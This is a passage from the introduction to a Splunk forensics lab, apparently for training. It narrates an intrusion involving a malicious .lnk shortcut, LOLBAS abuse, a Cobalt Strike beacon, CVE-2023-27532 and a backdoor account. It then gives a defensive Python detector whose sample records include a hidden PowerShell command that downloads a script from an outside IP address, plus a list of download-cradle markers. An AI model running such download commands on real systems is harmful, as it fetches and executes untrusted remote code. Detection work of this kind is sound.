Introduction

In this lab, we will conduct a forensic investigation of a targeted cyber attack that involved initial access via a malicious document, followed by persistence mechanisms, privilege escalation, and lateral movement. Using Splunk, we will analyze event logs, track malicious executions, and identify the compromised systems and the credentials used by the attacker. The investigation begins with the delivery of a malicious ZIP file named "Albert_Resume.zip", which contained a shortcut file (.lnk) masquerading as a resume. Opening this shortcut triggered a chain of events that led to the execution of PowerShell commands, which downloaded additional payloads from an external command and control (C2) server. The attacker then leveraged living-off-the-land binaries and scripts (LOLBAS) such as ie4uinit.exe and msxsl.exe to execute further malicious scripts while evading detection. As we analyze the attack timeline, we will uncover how the attacker deployed a Cobalt Strike beacon, executed a privilege escalation exploit, and attempted to exfiltrate sensitive credentials. The attack also included the exploitation of a known vulnerability (CVE-2023-27532) in Veeam Backup & Replication software, which allowed the adversary to extract stored credentials and further compromise the network.

Additionally, the investigation will highlight an unsuccessful RDP login attempt using stolen credentials and the attacker's creation of a hidden backdoor account ("admi1_2") to maintain persistence. These techniques, commonly seen in advanced persistent threat (APT) operations, demonstrate the complexity and stealth employed by adversaries in modern cyber intrusions.
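As an added example that is not part of the lab or its Splunk material, the following Python triage routine applies two of the process-chain checks implied by the narrative above, a PowerShell download cradle and ie4uinit.exe / msxsl.exe spawned beneath PowerShell, to constructed Sysmon-style process-creation records; the field names, command lines and the 198.51.100.7 address are assumptions for illustration.

```python
LOLBAS = {"ie4uinit.exe", "msxsl.exe"}          # binaries named in the lab
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "iwr ", "-enc", "http://", "https://")

# Constructed, Sysmon-like process-creation records (field names assumed).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",
     "cmdline": "C:\\Windows\\explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "powershell.exe",   # launched via the .lnk
     "cmdline": "powershell.exe -nop -w hidden -c "
                "Invoke-WebRequest http://198.51.100.7/s1.ps1"},
    {"pid": 300, "ppid": 200, "image": "ie4uinit.exe",
     "cmdline": "ie4uinit.exe"},
    {"pid": 400, "ppid": 200, "image": "msxsl.exe",
     "cmdline": "msxsl.exe C:\\Users\\bob\\AppData\\Local\\Temp\\a.xml "
                "C:\\Users\\bob\\AppData\\Local\\Temp\\b.xsl"},
    {"pid": 500, "ppid": 100, "image": "msxsl.exe",        # not under PowerShell
     "cmdline": "msxsl.exe report.xml report.xsl"},
]

def ancestry(events, pid):
    """Return image names from pid up to the root (pid first), by following ppid."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)                         # guard against pid-reuse loops
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain

def find_suspicious(events):
    """Flag (rule, pid) pairs for the download-cradle and LOLBAS-under-PowerShell patterns."""
    findings = []
    for e in events:
        img, cmd = e["image"].lower(), e["cmdline"].lower()
        if img == "powershell.exe" and any(m in cmd for m in CRADLE_MARKERS):
            findings.append(("powershell_download_cradle", e["pid"]))
        # Walk the full parent chain, so a LOLBAS binary is caught even if an
        # intermediate cmd.exe sits between it and PowerShell.
        if img in LOLBAS and "powershell.exe" in ancestry(events, e["ppid"]):
            findings.append(("lolbas_spawned_by_powershell", e["pid"]))
    return findings

if __name__ == "__main__":
    for rule, pid in find_suspicious(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid} chain={' <- '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

The same logic maps onto a Splunk search over Sysmon Event ID 1 by joining ParentProcessId to ProcessId; the benign msxsl.exe launched directly from explorer.exe (pid 500) is deliberately left unflagged.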

By the end of this lab, you will gain hands-on experience in track
